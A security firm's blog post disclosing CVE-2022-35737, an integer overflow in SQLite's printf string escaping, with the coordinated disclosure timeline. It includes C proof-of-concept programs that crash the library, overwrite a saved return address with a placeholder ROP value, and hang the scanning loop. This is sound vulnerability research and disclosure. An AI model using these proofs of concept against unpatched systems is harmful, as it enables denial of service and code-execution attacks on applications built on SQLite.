https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/

Trail of Bits Blog

Stranger Strings: An exploitable flaw in SQLite

October 25, 2022

By Andreas Kellas

Trail of Bits is publicly disclosing CVE-2022-35737, which affects applications that use the SQLite library API. CVE-2022-35737 was introduced in SQLite version 1.0.12 (released on October 17, 2000) and fixed in release 3.39.2 (released on July 21, 2022). CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is compiled: arbitrary code execution is confirmed when the library is compiled without stack canaries, but unconfirmed when stack canaries are present, and denial of service is confirmed in all cases.

On vulnerable systems, CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also show that if the format string contains the ! special character to enable Unicode character scanning, then it is possible to achieve arbitrary code execution in the worst case, or to cause the program to hang and loop (nearly) indefinitely.

SQLite is used in nearly everything, from naval warships to smartphones to other programming languages. The open-source database engine has a long history of being very secure: many CVEs that are initially pinned to SQLite actually don't impact it at all. This blog post describes a vulnerability that actually does impact certain versions of SQLite, along with our proof-of-concept exploits.

Although this bug may be difficult to reach in deployed applications, it is a prime example of a vulnerability that is made easier to exploit by "divergent representations" that result from applying compiler optimizations to undefined behavior.
In an upcoming blog post, we will show how to find instances of the divergent representations bug in binaries and source code.

Background: Stumbling onto a bug

A recent blog post presented a vulnerability in PHP that seemed like the perfect candidate for a variant analysis. The bug in that post manifested when a 64-bit unsigned integer string length was implicitly converted into a 32-bit signed integer when passed as an argument to a function. We formulated a variant analysis for this bug class and found a few bugs. Most of them were banal, but one in particular stood out: a function used for properly escaping quote characters in the PHP PDO SQLite module. And thus began our strange journey into SQLite string formatting.

SQLite is the most widely deployed database engine, thanks in part to its very permissive licensing and cross-platform, portable design. It is written in C, and can be compiled into a standalone application or a library that exposes APIs for application programmers to use. It seems to be used everywhere, a perception that was reinforced when we tripped right over this vulnerability while hunting for bugs elsewhere.

    static zend_string* sqlite_handle_quoter(pdo_dbh_t *dbh, const zend_string *unquoted, enum pdo_param_type paramtype)
    {
        char *quoted = safe_emalloc(2, ZSTR_LEN(unquoted), 3);
        /* TODO use %Q format? */
        sqlite3_snprintf(2*ZSTR_LEN(unquoted) + 3, quoted, "'%q'", ZSTR_VAL(unquoted));
        zend_string *quoted_str = zend_string_init(quoted, strlen(quoted), 0);
        efree(quoted);
        return quoted_str;
    }

In the call to sqlite3_snprintf (line 231 of the original listing), an unsigned long (2*ZSTR_LEN(unquoted) + 3) is passed as the first parameter to sqlite3_snprintf, which expects a signed integer. This felt exciting, and we quickly scripted a simple proof of concept. We expected to be able to exploit this bug to produce a poorly formatted string with mismatched quote characters by passing large strings to the function, and possibly achieve SQL injection in vulnerable applications.
Imagine our surprise when our proof of concept crashed the PHP interpreter.

There's a bug in my bug!

We quickly determined that the crash was occurring in the SQLite shared object, so we naturally took a closer look at the sqlite3_snprintf function. SQLite implements custom versions of the printf family of functions and adds the new format specifiers %Q, %q, and %w, which are designed to properly escape quote characters in the input string in order to make safe SQL queries.

For example, we wrote the following code snippet to properly use sqlite3_snprintf with the format specifier %q to output a string where all single-quote characters are escaped with another single quote. Additionally, the entire string is wrapped in a leading and trailing single quote, the way the PHP quote function intends:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>

    int main(int argc, char *argv[]) {
        char src[] = "hello, \'world\'!";
        char dst[sizeof(src) + 4]; // Add 4 to account for extra quotes.
        sqlite3_snprintf(sizeof(dst), dst, "'%q'", src);
        printf("src: %s\n", src);
        printf("dst: %s\n", dst);
        return 0;
    }

sqlite3_snprintf properly wraps the original string in single quotes, and escapes any existing single quotes in the input string.

Next, we changed our program to imitate the behavior of the PHP script by passing the same large 2GB string directly to sqlite3_snprintf:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>

    #define STR_LEN ((0x100000001 - 3) / 2)

    int main(int argc, char *argv[]) {
        char *src = calloc(1, STR_LEN + 1); // Account for NULL byte.
        memset(src, 'a', STR_LEN);
        char *dst = calloc(1, STR_LEN + 3); // Account for extra quotes and NULL byte.
        sqlite3_snprintf(2*STR_LEN + 3, dst, "'%q'", src);
        printf("src: %s\n", src);
        printf("dst: %s\n", dst);
        return 0;
    }

A crash!
We seem to have found a culprit: large inputs to sqlite3_snprintf. Thus began a journey down a rabbit hole where we discovered that SQLite does not properly handle large strings in parts of its custom implementations of the printf family of functions. Even further down the rabbit hole, we discovered that a compiler optimization made it easier to exploit the SQLite vulnerability.

The Vulnerability

The custom SQLite printf family of functions internally calls the function sqlite3_str_vappendf, which handles string formatting. Large string inputs to the sqlite3_str_vappendf function can cause signed integer overflow when the format substitution type is %q, %Q, or %w.

sqlite3_str_vappendf scans the input fmt string and formats the variable-sized argument list according to the format substitution types specified in the fmt string. In the case statement for handling the %q, %Q, and %w format specifiers (src/printf.c:L803-850), the function scans the input string for quote characters in order to calculate the correct number of output bytes (lines 824-828) and then copies the input to the output buffer and adds quotation characters as required (lines 842-845). In the snippet below, escarg points to the input string:

    case etSQLESCAPE:           /* %q: Escape ' characters */
    case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
    case etSQLESCAPE3: {        /* %w: Escape " characters */
      int i, j, k, n, isnull;
      int needQuote;
      char ch;
      char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
      char *escarg;

      if( bArgList ){
        escarg = getTextArg(pArgList);
      }else{
        escarg = va_arg(ap,char*);
      }
      isnull = escarg==0;
      if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
      /* For %q, %Q, and %w, the precision is the number of bytes (or
      ** characters if the ! flags is present) to use from the input.
      ** Because of the extra quoting characters inserted, the number
      ** of output characters may be larger than the precision.
      */
      k = precision;
      for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
        if( ch==q )  n++;
        if( flag_altform2 && (ch&0xc0)==0xc0 ){
          while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
        }
      }
      needQuote = !isnull && xtype==etSQLESCAPE2;
      n += i + 3;
      if( n>etBUFSIZE ){
        bufpt = zExtra = printfTempBuf(pAccum, n);
        if( bufpt==0 ) return;
      }else{
        bufpt = buf;
      }
      j = 0;
      if( needQuote ) bufpt[j++] = q;
      k = i;
      for(i=0; i<k; i++){
        bufpt[j++] = ch = escarg[i];
        if( ch==q ) bufpt[j++] = ch;
      }
      if( needQuote ) bufpt[j++] = q;
      bufpt[j] = 0;
      length = j;
      goto adjust_width_for_utf8;
    }

[...]

    #include <assert.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>

    // Offsets relative to sqlite3_str_vappendf stack frame base. Calculated using
    // the version of libsqlite3.so.0.8.6 provided by apt on Ubuntu 20.04.
    #define RETADDR_OFFSET 0
    #define CANARY_OFFSET 0x40
    #define BUF_OFFSET 0x88
    #define CANARY 0xbaadd00dbaadd00dull
    #define ROPGADGET 0xdeadbeefdeadbeefull
    #define NGADGETS 1

    struct payload {
        uint8_t padding1[BUF_OFFSET-CANARY_OFFSET];
        uint64_t canary;
        uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8];
        uint64_t ropchain[NGADGETS];
    }__attribute__((packed, aligned(1)));

    int main(int argc, char *argv[]) {
        char dst[256];
        struct payload p;

        memset(p.padding1, 'a', sizeof(p.padding1));
        p.canary = CANARY;
        memset(p.padding2, 'b', sizeof(p.padding2));
        p.ropchain[0] = ROPGADGET;

        size_t target_n = 0x80000000;
        assert(sizeof(p) + 3 <= target_n);
        size_t n = target_n - sizeof(p) - 3;
        size_t target_i = 0x100000000 + (sizeof(p) / 2);

        char *src = calloc(1, target_i);
        if (!src) {
            printf("bad allocation\n");
            return -1;
        }

        size_t cur = 0;
        memcpy(src, &p, sizeof(p));
        cur += sizeof(p);
        memset(src+cur, '\'', n/2);
        cur += n/2;
        assert(cur < 0x7ffffffeul);
        memset(src+cur, 'c', 0x7ffffffeul-cur);
        cur += 0x7ffffffeul-cur;
        src[cur] = '\xc0';
        cur++;
        memset(src+cur, '\x80', target_i - cur);
        cur = target_i;
        src[cur-1] = '\0';

        sqlite3_snprintf((int) 256, dst, "'%!q'", src);
        free(src);
        return 0;
    }

This proof of concept causes the program to crash, but with a
SIGABRT rather than a SIGSEGV. This implies that a stack canary was overwritten and that the vulnerable function tried to return. This is in contrast to the earlier proof of concept, which crashed before reaching the function return.

To confirm that we have successfully controlled the saved return address and stack canary, we can use GDB to view the stack frame before the vulnerable function returns. Executing the proof of concept in a debugger shows that the saved return address is set to 0xdeadbeefdeadbeef.

Note that in a non-contrived scenario, a real stack canary will contain a NULL byte, which would defeat the proof of concept above because the NULL byte will cause the string-scanning loop to terminate before the entire payload is copied over the return address. Clever exploitation techniques or specific format string conditions may allow an attacker to bypass this, but our intention is to show that the saved return address can be overwritten.

Looping (Nearly) Forever

We took our exploitation one step further and developed a proof of concept that uses the divergent representations of the i variable to cause loop [1] to iterate nearly infinitely by incrementing i 2^64 times, which effectively takes forever. This is achieved by causing the inner loop to increment i 2^32 times on every iteration of loop [1], which itself iterates 2^32 times.

The interesting part of this proof of concept is that it doesn't actually reach the vulnerable integer overflow computation on line 832, but uses only the undefined behavior that results from allowing string inputs larger than what can be represented with 32-bit integers.
All that is required is to fill a buffer of 0x100000000 bytes with Unicode prefix characters (a single byte of 0xc0 followed by bytes of 0x80), and the loop at [1] will never terminate:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>

    int main(int argc, char *argv[]) {
        size_t src_buf_size = 0x100000001;
        char *src = calloc(1, src_buf_size);
        if (!src) {
            printf("bad allocation\n");
            return -1;
        }
        src[0] = '\xc0';
        memset(src+1, '\x80', 0xffffffff);
        char dst[256];
        sqlite3_snprintf(256, dst, "'%!q'", src);
        free(src);
        return 0;
    }

We showed that CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also showed that if the format string additionally allows for Unicode characters by providing the ! character, then it is possible to overwrite the saved return address and to cause the program to loop (nearly) infinitely.

But, SQLite is well-tested, right?

SQLite is extensively tested with 100% branch test coverage. We discovered this vulnerability despite the tests, which raises the question: how did the tests miss it?

SQLite maintains an internal memory limit of 1GB, so the vulnerability is not reachable in the SQLite program. The problem is "defined away" by the notion that SQLite does not support the big strings necessary to trigger this vulnerability.

However, the C APIs provided by SQLite do not enforce that their inputs adhere to the memory limit, and applications are able to call the vulnerable functions directly. The notion that large strings are unsupported by SQLite is not communicated through the API, so application developers cannot know that they need to enforce input size limits on these functions. When this code was first written, most processors had 32-bit registers and 4GB of addressable memory, so allocating 1GB strings as input was impractical.
Now that 64-bit processors are quite common, allocating such large strings is feasible and the vulnerable conditions are reachable.

Unfortunately, this vulnerability is an example of one where extensive branch test coverage does not help, because no new code paths are introduced. 100% branch coverage says that every branch in the code has been exercised, but not how many times. This vulnerability is the result of invalid data that causes code to execute billions of times more than it should.

The thoroughness of SQLite's tests is remarkable, and the discovery of this vulnerability should not be taken as a knock on the robustness of the tests. In fact, we wish more projects put as much emphasis on testing as SQLite does. Nonetheless, this bug is evidence that even the best-tested software can have exploitable bugs.

Conclusion

Not every system or application that uses the SQLite printf functions is vulnerable. For those that are, CVE-2022-35737 is a critical vulnerability that can allow attackers to crash or control programs.

The bug has been particularly interesting to analyze, for a few reasons. For one, the inputs required to reach the bug condition are very large, which makes it difficult for traditional fuzzers to reach, and so techniques like static and manual analysis were required to find it. For another, it's a bug that may not have seemed like an error at the time that it was written (dating back to 2000 in the SQLite source code), when systems were primarily 32-bit architectures. And, most interestingly to us at Trail of Bits, its exploitation was made easier by the discovered "divergent representations" of the same source variable, which we explore further in a separate blog post.

I'd like to thank my mentor, Peter Goodman, for his expert guidance throughout my summer internship with Trail of Bits.
I'd also like to thank Nick Selby for his help in navigating the responsible disclosure process, and all members of the Trail of Bits team who assisted in advising and writing this blog post.

Coordinated disclosure

July 14, 2022: Reported vulnerability to the Computer Emergency Response Team (CERT) Coordination Center.
July 15, 2022: CERT/CC reported vulnerability to SQLite maintainers.
July 18, 2022: SQLite maintainers confirmed the vulnerability and fixed it in source code.
July 21, 2022: SQLite maintainers released SQLite version 3.39.2 with fix.

We would like to thank the teams at SQLite and CERT/CC for working swiftly with us to address these issues.

By Trail of Bits
Posted in Attacks, Internship Projects